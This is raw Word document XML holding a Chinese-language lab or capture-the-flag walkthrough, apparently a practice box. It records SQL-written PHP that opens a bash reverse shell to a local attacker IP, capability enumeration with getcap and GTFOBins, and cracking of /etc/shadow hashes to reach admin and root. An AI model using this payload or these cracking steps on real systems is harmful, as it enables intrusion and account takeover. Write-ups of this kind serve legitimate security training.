            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1807359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599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5CEE" w14:textId="7167F0B2" w:rsidR="004A5243" w:rsidRDefault="00D15CC4" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功了，</w:t>
      </w:r>
      <w:r w:rsidR="004A5243">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（要登出一下，因为session</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会冲突只</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发第一次的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命令）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29432D75" w14:textId="627DCE91" w:rsidR="00D15CC4" w:rsidRDefault="00D15CC4" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D15CC4">
        <w:t>select '&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D15CC4">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D15CC4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D15CC4">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D15CC4">
        <w:t>"bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D15CC4">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D15CC4">
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D15CC4">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D15CC4">
        <w:t>/192.168.</w:t>
      </w:r>
      <w:r>
        <w:t>21.131</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15CC4">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>666</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15CC4">
        <w:t xml:space="preserve"> 0&gt;&amp;1");exit;?&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0782E3" w14:textId="5B85CA9C" w:rsidR="004A5243" w:rsidRDefault="00D15CC4" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D15CC4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36BAADE5" wp14:editId="7F49F840">
            <wp:extent cx="5274310" cy="3803650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="899827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275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D236" w14:textId="218556B0" w:rsidR="004A5243" w:rsidRDefault="00D15CC4" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EC8C07" w14:textId="49EA2E19" w:rsidR="00D15CC4" w:rsidRDefault="00D15CC4" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D15CC4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37F73FDC" wp14:editId="2359BF67">
            <wp:extent cx="1924319" cy="1047896"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34311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119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E83A" w14:textId="7C04E76E" w:rsidR="004A5243" w:rsidRDefault="00D15CC4" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挂监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A25253A" w14:textId="1A5BE778" w:rsidR="00D15CC4" w:rsidRDefault="00D15CC4" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D15CC4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49D0FC0B" wp14:editId="71621593">
            <wp:extent cx="2896004" cy="1219370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="607806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65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10C" w:rsidRPr="0072410C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52CBB5B8" wp14:editId="2CA6844C">
            <wp:extent cx="5274310" cy="2033270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1414154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548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DEC3" w14:textId="3BF1D865" w:rsidR="0072410C" w:rsidRDefault="0072410C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BF4D68" w14:textId="337835FC" w:rsidR="0072410C" w:rsidRDefault="0072410C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A02109" w14:textId="027E3365" w:rsidR="0072410C" w:rsidRDefault="0072410C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0072410C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E8664F6" wp14:editId="6E2B269C">
            <wp:extent cx="5274310" cy="2633345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="231352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526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67DE" w14:textId="57131D86" w:rsidR="0072410C" w:rsidRDefault="0072410C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0072410C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13609472" wp14:editId="7B2B8911">
            <wp:extent cx="4191585" cy="3229426"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1912497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973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678A" w14:textId="1E09D022" w:rsidR="0072410C" w:rsidRDefault="0072410C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0072410C">
        <w:lastRenderedPageBreak/>
        <w:t>getcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0072410C">
        <w:t xml:space="preserve"> -r / 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8A51D5" w14:textId="64C7C27E" w:rsidR="0072410C" w:rsidRDefault="0072410C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0072410C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E7D55D5" wp14:editId="0952A21A">
            <wp:extent cx="3696216" cy="1438476"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="212508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84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A6DC" w14:textId="5BF1A5C2" w:rsidR="0072410C" w:rsidRDefault="0072410C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找</w:t>
      </w:r>
      <w:r w:rsidR="00150E71" w:rsidRPr="00150E71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看开启</w:t>
      </w:r>
      <w:r w:rsidR="00150E71" w:rsidRPr="00150E71">
        <w:t>capabilities的工具</w:t>
      </w:r>
      <w:r w:rsidR="00150E71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00150E71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>capabilities</w:t>
      </w:r>
      <w:r w:rsidR="00150E71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>资料：</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK "https://www.cnblogs.com/sparkdev/p/11417781.html"</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00150E71">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Capabilities 简介 - sparkdev - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00150E71">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>博客园</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00150E71">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t xml:space="preserve"> (cnblogs.com)</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00150E71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D914CE" w14:textId="2EF39450" w:rsidR="00150E71" w:rsidRDefault="00150E71" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有两个ping和tars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软件，去</w:t>
      </w:r>
      <w:r w:rsidRPr="00150E71">
        <w:t>https://gtfobins.github.io/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181FC2F2" w14:textId="5C691A98" w:rsidR="00150E71" w:rsidRDefault="00150E71" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00150E71">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="472E1C33" wp14:editId="40A389F6">
            <wp:extent cx="5274310" cy="1641475"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="366264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649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2C6C" w14:textId="5031DB3C" w:rsidR="00150E71" w:rsidRDefault="00150E71" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00150E71">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23B47207" wp14:editId="39478EDC">
            <wp:extent cx="5274310" cy="1765935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1358076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761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95A5" w14:textId="054C8556" w:rsidR="00150E71" w:rsidRDefault="00150E71" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坏了</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有提权的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机会，去看一下权限的组了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2402B83D" w14:textId="142F7F19" w:rsidR="00150E71" w:rsidRDefault="00150E71" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00150E71">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D2B9268" wp14:editId="0B9CA60E">
            <wp:extent cx="4753638" cy="1390844"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="8696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45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745B" w14:textId="25129BF3" w:rsidR="00150E71" w:rsidRDefault="00150E71" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？？？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447C4CB9" w14:textId="4CE49870" w:rsidR="00150E71" w:rsidRDefault="00150E71" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小脑萎缩了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD1CAB" w14:textId="04AD30D7" w:rsidR="004F720A" w:rsidRDefault="004F720A" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现了一件事，进</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错用户</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3CCF3C" w14:textId="6BDC6EEB" w:rsidR="004F720A" w:rsidRDefault="004F720A" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去admin（root大概率进不去），想起来了admin这里要</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码密码</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在数据库里面出现过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F79A598" w14:textId="569A2002" w:rsidR="004F720A" w:rsidRDefault="004F720A" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>啊啊啊啊</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2D6EF8" w14:textId="3208A05A" w:rsidR="004F720A" w:rsidRDefault="0059394B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0059394B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FFC659B" wp14:editId="54C41227">
            <wp:extent cx="5274310" cy="514985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1651946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466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48B7" w14:textId="6D8073CB" w:rsidR="0059394B" w:rsidRDefault="0059394B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解，建议用vim写进去，直接重定向会寄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712BE9DB" w14:textId="38B81AE1" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D00810">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09EBF2F2" wp14:editId="0C79029D">
            <wp:extent cx="5274310" cy="5302250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2018802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026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60D3" w14:textId="3A62C3A0" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mmm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>各种花式大爆炸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5B9A74" w14:textId="10064844" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去网上查了一下发现要影子文件还要passwd文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156D1B78" w14:textId="75ADD320" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们拿到的其实是影子文件加密后的密码</w:t>
      </w:r>
      <w:r w:rsidR="002C75B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3801EF10" w14:textId="30EE1F78" w:rsidR="002C75B8" w:rsidRDefault="002C75B8" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现我有台机子就是不行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A0DAD6" w14:textId="76ED1489" w:rsidR="002C75B8" w:rsidRDefault="002C75B8" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换了一台就好了（这就是传说中的水土不服？）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44755FA7" w14:textId="3FDFD26C" w:rsidR="002C75B8" w:rsidRPr="002C75B8" w:rsidRDefault="002C75B8" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C75B8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08985A45" wp14:editId="1E4D89A3">
            <wp:extent cx="5274310" cy="1880870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="410979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796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A14B" w14:textId="06EF3CA6" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D00810">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22F64E79" wp14:editId="5E2D4B33">
            <wp:extent cx="5229955" cy="3553321"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="766091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913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FBAB" w14:textId="2ADEB479" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asswd在前影子在后写进心得文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D515395" w14:textId="762D5185" w:rsidR="00D00810" w:rsidRDefault="00BF164C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF164C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="566187BE" wp14:editId="462435B6">
            <wp:extent cx="5274310" cy="456565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1592864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64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5A51" w14:textId="77777777" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E45FF2" w14:textId="421F5297" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登入admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3773AAAB" w14:textId="6A7034BC" w:rsidR="0059394B" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D00810">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DA3FD3D" wp14:editId="47371169">
            <wp:extent cx="1933845" cy="733527"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1628604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045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D615" w14:textId="10BFD1F0" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集（应该大差不差）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C131DD" w14:textId="6699259D" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D00810">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C44DE3D" wp14:editId="569F9675">
            <wp:extent cx="5274310" cy="1993265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="943729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92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609B" w14:textId="3BD58373" w:rsidR="00D00810" w:rsidRDefault="00D00810" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D00810">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09209EFC" wp14:editId="437FD29C">
            <wp:extent cx="3753374" cy="3724795"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="227592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921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05C8" w14:textId="67E60886" w:rsidR="00D00810" w:rsidRDefault="00BF164C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是一样的吧root用户的密码爆破出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC691C2" w14:textId="526CB44D" w:rsidR="00BF164C" w:rsidRDefault="00BF164C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF164C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02D054B7" wp14:editId="0D4E94AD">
            <wp:extent cx="3772426" cy="1495634"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1819099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998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64C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F4DD779" wp14:editId="58500D34">
            <wp:extent cx="3267531" cy="3477110"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1442039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396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C543" w14:textId="3B3923EA" w:rsidR="00BF164C" w:rsidRDefault="00BF164C" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现不行，看看使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61A92EA9" w14:textId="6B433102" w:rsidR="00BF164C" w:rsidRDefault="002A57F1" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002A57F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BBC1BA8" wp14:editId="4A7DAE4F">
            <wp:extent cx="3391373" cy="2219635"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1174641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410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B5B2" w14:textId="540B27E0" w:rsidR="002A57F1" w:rsidRDefault="002A57F1" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002A57F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B05A367" wp14:editId="3848238B">
            <wp:extent cx="5274310" cy="7720330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1495828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285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7ECE" w14:textId="1C6EAF99" w:rsidR="002A57F1" w:rsidRDefault="002A57F1" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mm真有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之前没扫出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAA8D7D" w14:textId="48EB655A" w:rsidR="002A57F1" w:rsidRDefault="002A57F1" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002A57F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099C043E" wp14:editId="29B99050">
            <wp:extent cx="5274310" cy="1755140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
